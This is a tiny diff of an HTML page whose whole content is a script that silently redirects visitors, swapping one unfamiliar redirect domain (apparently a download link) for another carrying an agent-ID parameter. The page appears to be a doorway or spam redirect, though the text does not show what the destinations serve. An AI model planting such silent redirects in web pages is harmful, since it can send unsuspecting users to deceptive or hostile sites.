--- a/832704.html
+++ b/832704.html
@@ -1,3 +1,3 @@
 <script>
-  window.location.href="https://dl.hawcyy.com/?parent=832704&t=1592613557"
+  window.location.href="https://main.RY872.com/?AgentId=202048"
 </script>
